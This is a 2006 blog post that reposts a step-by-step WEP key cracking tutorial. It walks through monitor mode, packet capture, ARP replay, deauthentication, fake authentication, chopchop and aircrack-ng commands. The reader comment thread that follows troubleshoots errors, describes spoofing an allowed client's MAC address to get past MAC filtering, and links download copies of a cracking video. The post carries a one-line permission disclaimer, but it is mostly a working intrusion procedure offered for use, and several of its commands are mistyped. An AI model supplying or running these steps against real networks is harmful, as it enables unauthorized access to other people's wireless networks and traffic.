Hacking – Wep Cracking – Ultimate Guide (Video)

7 08 2006

I just cut and pasted the whole article. Namely because this is a great guide. I have seen many many screenrecord guides and a whoel video on the subject, but the hard text is way more helpful. BTW – Backtrack has its final release out now. It so totally rocks.

Cracking WEP: The ultimate guide

[ via profit42 ]

##### Preparation #####

1. Download BackTrack (http://www.remote-exploit.org/index.php/BackTrack_Downloads)

2. Install BackTrack to your hd or just boot the live cd (username: root, password: toor; Don’t froget to start the gui: type in startx on the command lien after logging in).

3. Start up a terminal and set your wireless interface in monitor mode.

iwconfig [wireless interface] mode monitor

* to find out what your wireless interface is, type iwconfig and press enter. All interfaces will show up (mine is ath0).

4. Start airodump by typing in the terminal (press enter after typing it in)

airodump-ng –ivs -w capture [wireless interface]

5. When airodump found the network you want to hack it’ll show up. Note the BSSID (acces point’s mac address) and the SSID (the access point’s name). Don’t close this terminal window or stop airodump from running before you have the wep key!

##### Generating data, method one: There are clients visible in airodump associated to the network #####

1. Open a new terminal window and type in (press enter after typing in):

aireplay-ng [wireless interface] –arpreplay -e [the SSID which you found with airodump] -b [the BSSID you found wth airodump] -h 01:02:03:04:05:06

2. Open another new terminal window and type in (press enter after typing in):

aireplay-ng [wireless interface] –deauth 10 -a [the client’s MAC adress]

3. Wait a long time, aproximatly 10 minutes. You should see the data field in airodump raising. If you have around 500k of data, go to the cracking step of this tutorial.

##### Generating data, method two: There are NO clients visible in airodump associated to the network #####

1. Open a new terminal window and type in (do NOT press the enter button!)

aireplay-ng [wireless interface] –arpreplay -e [the SSID which you found with airodump] -b [the BSSID you found wth airodump] -h 01:02:03:04:05:06

2. Open another new terminal window and type in (do NOT press the enter button!):

aireplay-ng [wireless interface] –fakeauth -e [the SSID which you found with airodump] -a [the BSSID you found wth airodump] -h 01:02:03:04:05:06

3. Press enter in the fakeauth terminal and after it started to fakeauth, press enter as quickly as possible in the arpreplay window.

3. Open another new terminal window and type in (press enter after typing in):

aireplay-ng [wireless interface] –deauth 10 -a 01:02:03:04:05:06

4. Wait a long time, aproximatly 10 minutes. You should see the data field in airodump raising. If you have around 500k of data, go to the cracking step of this tutorial.

##### If the above two methods aren’t working, try this #####

1. Open a new terminal window and type in (press the enter button after typing it in):

aireplay-ng [wireless interface] –fakeauth -e [the SSID which you found with airodump] -a [the BSSID you found wth airodump] -h 01:02:03:04:05:06

2. Open another new terminal window and type in (press the enter button after typing it in):

aireplay-ng [wireless interface] –chopchop -e [the SSID which you found with airodump] -b [the BSSID you found wth airodump] -h 01:02:03:04:05:06

3. The chopchop starts reading packages. When it finds one, it’ll ask you to use it. Choose yes. Wait a few seconds/minutes and remember the filename that is given to you at the end.

4. Open Ethereal (click the icon in the bottom left corner > Backtrack > Sniffers > Ethereal) and open the xor file made with the chopchop attack in Ethereal (it’s located in the home folder)

5. Look with Ethereal in the captured file. Try to find the source ip and the destination ip: write those addresses down somewhere.

6. open a terminal and type in (press enter after typing in):

arpforge-ng [the name of the xor file from the chopchop attack] 1 [the BSSID you found wth airodump] 01:02:03:04:05:06 [the source ip] [the destination ip] arp.cap

7. In a new or in the same terinal window, type in (and press enter):

aireplay-ng -2 ath0 -r arp.cap

5. Wait a long time, aproximatly 10 minutes. You should see the data field in airodump raising. If you have around 500k of data, go to the cracking step of this tutorial.

##### The actual cracking of the WEP key #####

1. Open a new terminal window and type in

airecrack-ng -n 64 capture-01.ivs (for a 64 bits encryption, enter after typing)

or

airecrack-ng -n 128 capture-01.ivs (for a 128 bits encryption, enter after typing)

If you don’t know how strong the encryption is, type in both in different terminals and start a third terminal. Type in this code:

airecrack-ng capture-01.ivs

2. Wait a few minutes. Check the terminal(s). The code will automaticly show up if found. Keep airodump running!
DISLAIMER:I don’t think I have to mention that you need written permission from the owner of the network before you are allowed to start cracking his wep or even before you are allowed to capture packages. Just try it with your own network. You’ll learn a lot about it. But never ever try it with another network than your own.

I’ve done it to my own WiFi at home and the simplicity of it is mind boggling. My philosophy is that the more people have out there that shows the lask of security, the more the security ware people will actually make there apps/hardware/code secure.

This text “how to” may be a bit confusing because you can’t see the command line, for us visual learners that is a bit of a handicap. So I hunted around for the old whoppix wep cracking AVI. Every link I could find that took me to a direct view of the video (originally presented in flash) was dead so I found a place to DL the actualy file. I wanted to preseve the best quality so I just posted it for download.  Click the link below to DL the ORIGINAL video file from rapidshare. (BTW – its around 50mb)

Download The 7z File Here>> It is labeled  Wep Cracking AVI.7z
This is themostboringblogintheowrld saying keep information free.


Actions

Information

28 responses

6 12 2006
Eric

Hey, you say in the guide here https://themostboringblogintheworld.wordpress.com/2006/08/07/hacking-wep-cracking-ultimate-guide/ that you just burn backtrack to your Hard drive or a cd but its not that easy? I’ve tried heaps of times, some as just iso images, some as boot disks and nothing works. how the flip do yuo burn this iso? Ideally i do it to my harddrive. I got alcohol 120 and tried mounting the iso? i’m puzzled? can you help mate

18 10 2009
JHAWK65

Hey, If you have windows (ugh) I did it with cdxp burner. Just get a cd or dvd and click burn iso image wait for the burnt cd or dvd to pop out of the drive if u have a laptop and but it back in and booot from cd. If you want to know how to install it to your hard drive then email me at jhawk65@ymail.com an I will be more than happy to tell you how to do so. Because you have to manually install it there is no installer program. Thats what I did, I’m on it right now actually and never been happier with an OS like this. 🙂

25 04 2011
Hacking Hamster

You download the .iso image then install the iso image onto a usb flashdrive that has been formatted into FAT32. To install Backtrack, use Unetbootin to help you. My site http://www.hackinghamster.com has the full tutorial and more! Hack wifi WEP/WPA and perform MITM attacks. Learn how to defend from all those too! Good Luck.

6 12 2006
therealdonquixote

A. I Don’t think you can boot from a mounted image, seeing as how you need your windows OS running with the proper drivers installed to use the virtual drive.

B. You can burn the ISO to a CD with Nero. Or for a free option try HTfireman its a good freeware utility specifically for burning ISO’s. Then boot from the disc. (Of course I am assumeing that you have a space on your HDD that is clear and ready for BT to be installed on??). Once you are able to actually boot from the disc, then run the regular installer that is in the backtrack folder.

If none of what you have tried has worked, then you need to 1. Re-download the image file 2. Check to make sure your Bios is set up to check the CD drive to boot from first.

Hope this helps. Email me if you run into trouble. BTW use the stable version (final release) not the beta’s to try this with. The Beta’s are still a little buggy, that’s why they are beta’s 😉

22 12 2006
blah

“aireplay-ng [wireless interface] –arpreplay -e [the SSID which you found with airodump] -b [the BSSID you found wth airodump] -h 01:02:03:04:05:06” after enteering this in backtrack 1 or 2 i get the follwing error: (Invalid AP MAC Address)this is what i entered: aireplay-ng [wireless interface] –arpreplay -e [the SSID which you found with airodump] -b [the BSSID you found wth airodump] -h 01:02:03:04:05:06) cannot figure out what the problem is.

22 12 2006
blah

sorry for previous reply – “aireplay-ng [wireless interface] –arpreplay -e [the SSID which you found with airodump] -b [the BSSID you found wth airodump] -h 01:02:03:04:05:06″

after enteering this in backtrack 1 or 2 i get the follwing error:
(Invalid AP MAC Address)this is what i entered: aireplay-ng ath1 -arpreplay -e dlink -b 00:0D:88:97:DB:2C -h 00:02:03:04:05:06″, cannot figure out what the problem is.

9 06 2007
pretorian

your link is not workng to the video – please up date it

20 06 2007
Screwt-K

Yo guy, just to tell you that it is aircrack-ng and not aircrack-ng

22 06 2007
mcinnocent

I have the same problem as BLAH:
i always get the error:
Invalid AP MAC Address

whats wrong?

22 06 2007
therealdonquixote

Everyone, this post is depricated as in its really old, you can see its oldness in that 64bit encryption is mentioned. No one has 64bit encryption anymore unless they have a really old ass WiFi router. Its all 128bit and up from here on out. There are many better and more modern tutorials out there right now. I’m pretty sure I habe a new one in the blog some where.

As for the “Invalid AP MAC address” issue:
Its hard to answer the question without knowing every step you have taken, which method you are using, or even if (and sorry for sounding like a RTFM nazi) if you are following the directions to the letter (note: some of the methods require that you do not press enter right away).

Obviously it has something to do with the MAC address that you are using for the Access Point that your are trying to crack. Can you open up Kismet and see if the signal strength on that MAC address is strong enough to crack? Sometimes you find an AP and the signal is so crap that you can’t really crack it cause it falls in and out of “range”.

Honestly, I got no other ideas. Try scouring the forums at remote exploit!! They are really helpful.

22 06 2007
beeeaph

the AP your trying to break has mac adress filtering, so you need to find the adress of one of the computers that can acess it and then change your mac adress to that, then try it again

23 06 2007
therealdonquixote

Dude, beeeaph. Nice catch there. Never would have thought of that, not in a million years. You deserve a link on me blogroll…if you have a site!!

Its not much, but its all I have to show appreciation for peeps being helpful and not flaming us n00bs. 🙂

TRDQ
Admin and Head n00b
TheMostBoringBlogInTheWorld

29 06 2007
Kris

when I type:
aireplay-ng ra0 –fakeauth -e Homelan -a xx:xx:xx:xx:xx:xx -h xx:xx:xx:xx:xx:xx
the problem is:” invalid reauthentication delay or missing value”
What’s wrong?

1 07 2007
newb

can someone plz update link to DL video?

thanks

7 07 2007
ccc

For the people with the “Invalid AP MAC address” note that the command has TWO dashes in front of the “arpreplay” parameter, unlike the later parameters that have 1 dash. Putting a single dash breaks things.

To make it easier, you can just use “aireplay-ng -3 …” instead of “airreplay-ng –arpreplay …”

17 07 2007
mon_mike

I had the same problem “invalid AP MAC address” , i think the problem was on the way you typed it…. instead of typing “-arpreplay” type”–arpreplay” with two bar

17 07 2007
mon_mike

sorry for double post, I made a mistake its not -arpreplay but its –arpreplay

17 07 2007
mon_mike

– – arpreplay this forum doesnt allow you to put two drew

19 07 2007
nutmonkey

Everyone w/ the “Invalid MAC Address” error, you are getting this b/c 01:02:03:04:05:06 <– was just a syntax showing you that you are suppose to put a valid MAC address here. In other words replace that with your MAC address of the wireless adapter you are using.

This is a good little write-up…found a few options here that I wasn’t sure how to use. Thanks!

29 07 2007
wi-fi

to newb: try this tutorial for Ubuntu Hacking WEP or WEP Crack Windows> Tutorial.

29 08 2007
King Solomon

You can try this tutorial video, different than text above, but good itself:

http://rapidshare.com/files/41288971/WEP_Cracking_.avi

30 08 2007
RandomJoe

It would also be a good idea to look at spoofing your mac address to look like a real client that is allowed on the network perhaps one spotted by “Kismet” or similar but not currently associated with the AP.

With backtrack2 (OS) this is often done for you if you enter a “wrong” mac then it sets it up for you with a
ifconfig hw ether 00:12:34:56:78:90
command (or is that iwconfig), newbie myself but got this working now 🙂
This will also help if the Mac filtering is on, on your chosen target AP.

7 09 2007
george

Everyone, this guide is appalling, and if you try to use it with the latest release of aircrack-ng or Backtrack 2, then it’s not going to work properly. For a start, the fakeauth part should have a value afterwards. This is why some people are getting invalid reauthentication values. You need a value between 0 and 6000. Go on the aircrack-ng website and do some homework. This guide will get you no-where. (This is coming from me, because like you i found this guide straight away and nothing fucking worked!! It’s shit.)

10 06 2008
i4free

welcome to http://www.i4free.co.cc to know more than here…

21 11 2008
johnny ronnald

hi,i use rt73 chipset.can support packet injection.but can’t inject at 500pps.i can inject only around 399pps.can someone tell me why and help me to solved this problem? i cracking wep use windows.take around 10-20 minute to get the key.so tired to waiting.
i cracking use windows+vmware+usb wifi.i just take 1 hour to learn cracking wep use windows. i just find tutorial here tutorial cracking wireless wep use windows

21 11 2008
CRACKING WEP USE WINDOWS IN 3 MINUTE

thanks johnny ronnald.great tutorial.very clean.can find tutorial here > Tutorial Cracking Wireless Wep Use Windows <

25 04 2011
Hacking Hamster

Nice tutorial. To see another way to hack WEP/WPA keys check out my site http://www.hackinghamster.com . I can do it under five minutes and you can too. Also check out my newborn hamsters on my site!

25 04 2011
Hacking Hamster

google Hacking hamster and you will see the better tutorial

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s




%d bloggers like this: